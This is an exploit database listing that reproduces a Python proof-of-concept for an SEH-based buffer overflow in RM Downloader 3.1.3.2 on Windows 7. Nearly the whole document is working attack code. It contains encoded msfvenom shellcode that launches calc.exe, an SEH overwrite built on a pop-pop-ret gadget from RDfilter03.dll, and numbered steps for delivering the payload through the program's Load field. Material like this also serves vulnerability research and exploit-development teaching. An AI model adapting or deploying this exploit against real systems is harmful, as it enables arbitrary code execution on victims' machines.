Exploit for RM Downloader 3.1.3.2.2010.06.13 Buffer Overflow

Name: Exploit for RM Downloader 3.1.3.2.2010.06.13 Buffer Overflow
Rating: 5 (52 reviews)
2020-04-22 | CVSS 1.0
## https://sploitus.com/exploit?id=PACKETSTORM:157344
# Exploit Title: RM Downloader 3.1.3.2.2010.06.13 - 'Load' Buffer Overflow (SEH)  
# Date: 2020-04-20  
# Author: Felipe Winsnes  
# Software Link: https://www.exploit-db.com/apps/9af366e59468eac0b92212912b5c3bcb-RMDownloader.exe  
# Version: 3.1.3.2.2010.06.13  
# Tested on: Windows 7 (x86)  
  
# Proof of Concept:  
# 1.- Run the python script, it will create a new file "poc.txt"  
# 2.- Copy the content of the new file 'poc.txt' to clipboard  
# 3.- Open 'RmDownloader.exe'  
# 4.- Go to 'Load' tab  
# 5.- Paste clipboard in 'Load' parameter  
# 6.- Click on button 'OK'  
# 7.- Two messageboxes regarding the length of the payload will pop up, click OK  
# 8.- Profit  
  
# Blog where the vulnerability is explained: https://whitecr0wz.github.io/posts/RM-Downloader-SEH/  
  
import struct  
  
# msfvenom -p windows/exec CMD=calc.exe -f py -e x86/alpha_mixed EXITFUNC=thread   
# Payload size: 448 bytes  
  
buf = b""  
buf += b"\x89\xe3\xda\xd0\xd9\x73\xf4\x5f\x57\x59\x49\x49\x49"  
buf += b"\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43"  
buf += b"\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41"  
buf += b"\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42"  
buf += b"\x58\x50\x38\x41\x42\x75\x4a\x49\x4b\x4c\x39\x78\x6b"  
buf += b"\x32\x53\x30\x57\x70\x57\x70\x35\x30\x4d\x59\x4d\x35"  
buf += b"\x46\x51\x79\x50\x72\x44\x4e\x6b\x56\x30\x76\x50\x4c"  
buf += b"\x4b\x50\x52\x66\x6c\x4c\x4b\x66\x32\x72\x34\x4e\x6b"  
buf += b"\x63\x42\x67\x58\x46\x6f\x4e\x57\x71\x5a\x47\x56\x35"  
buf += b"\x61\x4b\x4f\x6c\x6c\x65\x6c\x51\x71\x61\x6c\x73\x32"  
buf += b"\x66\x4c\x31\x30\x7a\x61\x6a\x6f\x54\x4d\x37\x71\x79"  
buf += b"\x57\x4d\x32\x4c\x32\x36\x32\x62\x77\x6c\x4b\x76\x32"  
buf += b"\x42\x30\x4e\x6b\x61\x5a\x45\x6c\x4c\x4b\x42\x6c\x32"  
buf += b"\x31\x42\x58\x4d\x33\x32\x68\x47\x71\x6b\x61\x70\x51"  
buf += b"\x6c\x4b\x61\x49\x47\x50\x33\x31\x4b\x63\x4e\x6b\x30"  
buf += b"\x49\x67\x68\x49\x73\x35\x6a\x30\x49\x6c\x4b\x45\x64"  
buf += b"\x4c\x4b\x35\x51\x69\x46\x45\x61\x4b\x4f\x4c\x6c\x4b"  
buf += b"\x71\x68\x4f\x34\x4d\x66\x61\x69\x57\x34\x78\x59\x70"  
buf += b"\x54\x35\x38\x76\x73\x33\x51\x6d\x39\x68\x35\x6b\x71"  
buf += b"\x6d\x56\x44\x30\x75\x5a\x44\x76\x38\x4c\x4b\x72\x78"  
buf += b"\x54\x64\x33\x31\x38\x53\x70\x66\x6e\x6b\x56\x6c\x70"  
buf += b"\x4b\x4e\x6b\x50\x58\x75\x4c\x55\x51\x78\x53\x4e\x6b"  
buf += b"\x56\x64\x6e\x6b\x73\x31\x6e\x30\x6e\x69\x37\x34\x56"  
buf += b"\x44\x71\x34\x53\x6b\x33\x6b\x63\x51\x61\x49\x73\x6a"  
buf += b"\x56\x31\x6b\x4f\x49\x70\x73\x6f\x31\x4f\x43\x6a\x4e"  
buf += b"\x6b\x67\x62\x6a\x4b\x6e\x6d\x73\x6d\x32\x4a\x46\x61"  
buf += b"\x6c\x4d\x4c\x45\x38\x32\x47\x70\x35\x50\x67\x70\x62"  
buf += b"\x70\x53\x58\x54\x71\x4c\x4b\x52\x4f\x4b\x37\x49\x6f"  
buf += b"\x38\x55\x6d\x6b\x49\x70\x65\x4d\x46\x4a\x75\x5a\x31"  
buf += b"\x78\x79\x36\x7a\x35\x6f\x4d\x6d\x4d\x4b\x4f\x68\x55"  
buf += b"\x65\x6c\x57\x76\x71\x6c\x47\x7a\x4f\x70\x49\x6b\x6b"  
buf += b"\x50\x74\x35\x37\x75\x6d\x6b\x61\x57\x75\x43\x71\x62"  
buf += b"\x72\x4f\x43\x5a\x65\x50\x66\x33\x6b\x4f\x6a\x75\x70"  
buf += b"\x63\x55\x31\x72\x4c\x31\x73\x76\x4e\x72\x45\x43\x48"  
buf += b"\x50\x65\x67\x70\x41\x41"  
  
  
nseh = struct.pack("<I", 0x06710870)  
seh = struct.pack("<I", 0x10031779) # 0x10031779 : pop ebx # pop eax # ret | ascii {PAGE_EXECUTE_READ} [RDfilter03.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Program Files\Mini-stream\RM Downloader\RDfilter03.dll)  
  
buffer = "A" * 9008 + nseh + seh + "\x41\x49" * 10 + buf + "\xff" * 200  
f = open ("poc.txt", "w")  
f.write(buffer)  
f.close()